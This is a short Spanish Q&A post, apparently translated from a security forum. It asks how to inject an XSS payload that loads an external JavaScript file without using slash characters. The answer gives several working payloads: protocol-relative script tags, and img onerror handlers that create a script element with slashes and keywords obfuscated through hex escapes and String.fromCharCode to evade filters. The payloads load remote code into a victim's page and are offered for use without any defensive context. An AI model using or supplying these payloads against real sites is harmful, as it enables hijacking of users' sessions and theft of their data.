¿Existe un vector de ataque XSS que permita la inclusión de un archivo .js externo sin tener que usar barras diagonales?
digamos que la ruta del archivo es somewebsite.com/js/xss.js
¿Hay alguna forma de pasarlo a un parámetro que funcione y sin que contenga barras diagonales
Un ejemplo que no funcionaría es: %código% Esto funciona bien porque no tengo que cerrar la etiqueta, pero tampoco funciona porque tengo que usar barras diagonales para navegar al archivo JS
Siempre puedes usar referencias de caracteres:
<script src='//somewebsite.com/js/xss.js'>
Esto también funciona sin comillas:
<script src=//somewebsite.com/js/xss.js>
También puedes usar JavaScript para inyectar el elemento script y generar el carácter / con JavaScript de alguna manera:
<img src="" onerror="s=document.createElement('script'); s.src='\x2F\x2Fsomewebsite.com\x2Fjs\x2Fxss.js'; document.body.appendChild(s)">
Y sin ninguna cita:
<img src= onerror=s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.src=String.fromCharCode(47,47,115,111,109,101,119,101,98,115,105,116,101,46,99,111,109,47,106,115,47,120,115,115,46,106,115);document.body.appendChild(s)>
Lea otras preguntas en las etiquetas web-application xss php